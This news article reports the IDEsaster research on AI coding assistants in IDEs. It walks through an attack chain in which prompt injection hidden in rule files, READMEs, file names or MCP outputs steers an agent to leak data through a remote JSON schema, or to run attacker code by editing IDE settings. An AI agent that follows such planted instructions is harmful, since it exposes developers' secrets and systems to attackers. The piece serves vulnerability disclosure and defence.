IDEsaster: Critical AI Tool Flaws Enable Data Theft and Remote Hacks

Overview of the IDEsaster Research Report

A six-month investigation into AI-assisted development tools has revealed over thirty security vulnerabilities that allow data exfiltration and, in some cases, remote code execution. The findings, outlined in the IDEsaster research report, highlight how AI agents embedded in integrated development environments (IDEs) such as Visual Studio Code, JetBrains products, Zed, and numerous commercial assistants can be manipulated to leak sensitive information or execute attacker-controlled code.

According to the research, 100% of tested AI IDEs and coding assistants were found to be vulnerable. Affected products include GitHub Copilot, Cursor, Windsurf, Kiro.dev, Zed.dev, Roo Code, Junie, Cline, Gemini CLI, and Claude Code. At least twenty-four of these have been assigned Common Vulnerabilities and Exposures (CVEs), with additional advisories from AWS.

Core Issues in AI-Integrated IDEs

The core issue stems from how AI agents interact with long-standing IDE features. These editors were never designed for autonomous components capable of reading, editing, and generating files. When AI assistants gained these abilities, previously benign features became potential attack surfaces.

“All AI IDEs... effectively ignore the base software... in their threat model. They treat their features as inherently safe because they've been there for years. However, once you add AI agents that can act autonomously, the same features can be weaponized into data exfiltration and RCE primitives,” said security researcher Ari Marzouk, speaking to The Hacker News.

Attack Chain and Vulnerability Examples

The research report describes an IDE-agnostic attack chain that begins with context hijacking via prompt injection. Hidden instructions can be planted in rule files, READMEs, file names, or outputs from malicious MCP servers. Once an agent processes that context, its tools can be directed to perform legitimate actions that trigger unsafe behaviors in the base IDE. The final stage abuses built-in features to extract data or execute attacker code across any AI IDE sharing that base software layer.

One documented example involves writing a JSON file that references a remote schema. The IDE automatically fetches that schema, leaking parameters embedded by the agent, including sensitive data collected earlier in the chain. Visual Studio Code, JetBrains IDEs, and Zed all exhibited this behavior. Even developer safeguards like diff previews did not suppress the outbound request.

Another case study demonstrates full remote code execution through manipulated IDE settings. By editing an executable file already present in the workspace and then modifying configuration fields such as php.validate.executablePath, an attacker can cause the IDE to immediately run arbitrary code the moment a related file type is opened or created. JetBrains tools show similar exposure through workspace metadata.

Recommendations and Long-Term Fixes

The report concludes that in the short term, the vulnerability class cannot be eliminated because current IDEs were not built under what the researcher calls the “Secure for AI” principle. Mitigations exist for both developers and tool vendors, but the long-term fix requires fundamentally redesigning how IDEs allow AI agents to read, write, and act inside projects.

Key Takeaways

• All AI IDEs Tested Are Vulnerable: The research found that every AI-powered IDE tested had exploitable vulnerabilities.
• Attack Vectors Are Diverse: From context hijacking to manipulating settings, attackers can exploit multiple points of entry.
• Need for Secure Design Principles: The report emphasizes the importance of rethinking how IDEs are designed to accommodate AI agents securely.
• Mitigations Exist, But Long-Term Changes Are Needed: Developers and vendors can implement temporary fixes, but a fundamental redesign of IDE architecture is necessary for lasting security.